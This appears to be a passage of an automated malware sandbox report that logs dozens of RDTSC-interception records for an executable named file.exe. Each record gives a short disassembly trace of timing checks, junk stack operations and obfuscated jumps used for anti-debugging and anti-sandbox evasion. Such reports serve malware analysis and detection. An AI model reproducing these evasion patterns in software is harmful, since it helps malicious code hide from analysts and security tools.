Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12339F1 second address: 1233A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FECC5126356h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233BC5 second address: 1233BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233BCA second address: 1233C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126362h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007FECC5126369h 0x00000014 pop edi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233C05 second address: 1233C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007FECC5476B32h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FECC5476B26h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233C2D second address: 1233C37 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233C37 second address: 1233C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC5476B2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1245768 second address: 1245771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1245771 second address: 1245775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12522C7 second address: 1252302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC5126369h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jmp 00007FECC5126363h 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FECC5126356h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252302 second address: 1252306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252306 second address: 125230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252702 second address: 125270E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECC5476B26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125270E second address: 125271F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edi 0x00000009 jp 00007FECC5126356h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252B26 second address: 1252B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FECC5476B26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252B31 second address: 1252B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC512635Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252F3D second address: 1252F59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1252F59 second address: 1252F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FECC5126356h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FECC512635Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253244 second address: 1253248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124B51A second address: 124B51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121B386 second address: 121B38C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121B38C second address: 121B3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FECC512636Ch 0x0000000e jmp 00007FECC5126360h 0x00000013 ja 00007FECC5126356h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c js 00007FECC512635Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253C00 second address: 1253C05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253ECE second address: 1253EDA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FECC5126356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253EDA second address: 1253EE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12562E5 second address: 1256318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jmp 00007FECC5126366h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FECC5126360h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258803 second address: 125880D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FECC5476B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125880D second address: 1258811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1257917 second address: 125791B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258A54 second address: 1258A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258A58 second address: 1258A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262444 second address: 126244A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126244A second address: 12624D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jmp 00007FECC5476B2Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 je 00007FECC5476B2Eh 0x00000016 jg 00007FECC5476B28h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jp 00007FECC5476B3Fh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push edi 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c jp 00007FECC5476B26h 0x00000032 popad 0x00000033 pop edi 0x00000034 pop eax 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FECC5476B28h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f jo 00007FECC5476B29h 0x00000055 movzx esi, cx 0x00000058 push EA8CB3D1h 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12624D6 second address: 12624DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126280D second address: 1262817 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12628F8 second address: 1262902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126331E second address: 1263322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263322 second address: 1263326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126351B second address: 126351F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126351F second address: 1263529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126373F second address: 1263744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263744 second address: 1263777 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FECC512635Dh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FECC512636Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12645FE second address: 1264603 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264E9B second address: 1264EA5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264EA5 second address: 1264EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264EAB second address: 1264EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126883B second address: 126884F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jng 00007FECC5476B26h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126884F second address: 1268855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268855 second address: 126887E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FECC5476B26h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FECC5476B38h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A53B second address: 122A541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A541 second address: 122A547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A547 second address: 122A54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A54B second address: 122A55C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268E8F second address: 1268EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FECC512636Bh 0x0000000e jne 00007FECC5126365h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FECC5126358h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f push 00000000h 0x00000031 clc 0x00000032 mov esi, dword ptr [ebp+122D1D20h] 0x00000038 push 00000000h 0x0000003a jmp 00007FECC5126366h 0x0000003f movsx edi, di 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268EF9 second address: 1268EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269913 second address: 1269918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126BD5D second address: 126BD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126C1F2 second address: 126C219 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC512636Eh 0x00000008 jmp 00007FECC5126368h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126C219 second address: 126C267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 nop 0x00000007 add edi, dword ptr [ebp+122D29DCh] 0x0000000d push 00000000h 0x0000000f and edi, dword ptr [ebp+122D2AA4h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FECC5476B28h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 and ebx, 4AF93433h 0x00000037 mov dword ptr [ebp+122D183Ch], eax 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pushad 0x00000042 popad 0x00000043 pop esi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E2E5 second address: 126E30E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECC5126366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FECC512635Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126F57C second address: 126F581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1270667 second address: 1270680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC5126365h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126F581 second address: 126F5BA instructions: 0x00000000 rdtsc 0x00000002 je 00007FECC5476B3Fh 0x00000008 jmp 00007FECC5476B39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jp 00007FECC5476B2Ch 0x00000017 jns 00007FECC5476B2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12744A8 second address: 12744AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12744AE second address: 12744B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12744B4 second address: 12744B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12744B8 second address: 1274533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b je 00007FECC5476B26h 0x00000011 jmp 00007FECC5476B37h 0x00000016 popad 0x00000017 ja 00007FECC5476B2Ch 0x0000001d popad 0x0000001e nop 0x0000001f mov dword ptr [ebp+1245F9CEh], edx 0x00000025 stc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007FECC5476B28h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 jnp 00007FECC5476B26h 0x00000048 push 00000000h 0x0000004a mov bh, CEh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 ja 00007FECC5476B26h 0x00000056 jnp 00007FECC5476B26h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1274533 second address: 1274539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12764A7 second address: 12764B1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FECC5476B2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12775C0 second address: 1277616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d cmc 0x0000000e mov bl, F8h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FECC5126358h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jmp 00007FECC512635Eh 0x00000031 push 00000000h 0x00000033 mov di, 08E8h 0x00000037 push eax 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1277616 second address: 127761A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127761A second address: 127761E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278657 second address: 127865C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127865C second address: 1278661 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278661 second address: 12786FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3058h], eax 0x00000010 mov di, B8A4h 0x00000014 push 00000000h 0x00000016 jmp 00007FECC5476B37h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FECC5476B28h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 jng 00007FECC5476B42h 0x0000003d call 00007FECC5476B35h 0x00000042 sub dword ptr [ebp+124586DBh], esi 0x00000048 pop edi 0x00000049 xchg eax, esi 0x0000004a jmp 00007FECC5476B2Ch 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FECC5476B37h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12766AC second address: 12766CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jnp 00007FECC512635Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127774C second address: 127775A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127775A second address: 127775E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A542 second address: 127A546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A546 second address: 127A550 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A550 second address: 127A55A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FECC5476B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127775E second address: 12777EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FECC5126358h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D1E60h], edi 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jmp 00007FECC512635Bh 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2A48h] 0x00000046 add dword ptr [ebp+122D1B57h], ebx 0x0000004c mov eax, dword ptr [ebp+122D060Dh] 0x00000052 mov ebx, dword ptr [ebp+122D32A7h] 0x00000058 push FFFFFFFFh 0x0000005a nop 0x0000005b js 00007FECC5126362h 0x00000061 jbe 00007FECC512635Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12777EA second address: 12777F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jc 00007FECC5476B34h 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C609 second address: 127C60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127C60F second address: 127C615 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12746B9 second address: 12746BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127CC24 second address: 127CC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC5476B34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12746BD second address: 12746C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
